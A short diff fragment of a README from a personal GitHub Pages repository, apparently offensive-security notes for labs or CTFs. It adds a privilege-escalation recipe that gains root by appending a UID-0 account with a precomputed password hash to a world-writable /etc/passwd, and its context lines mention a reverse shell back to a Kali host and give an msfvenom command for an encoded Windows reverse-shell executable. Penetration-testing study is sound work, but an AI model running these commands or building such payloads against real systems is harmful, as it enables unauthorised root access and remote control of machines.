dayaramb/dayaramb.github.io/README.md

 ```
 After it runs successfully you will get reverse shell back to kali.

+### /etc/passwd world writable
+* Simply appending in /etc/passwd and making the UID 0 will provide you the root access to system.
+* Generate the password:  perl -le 'print crypt("foo", "aa")'
+to set the password to foo.
+* daya:aaKNIEDOaueR6:0:0:daya:/tmp/daya:/bin/bash
 ### Useful Commands:
 msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]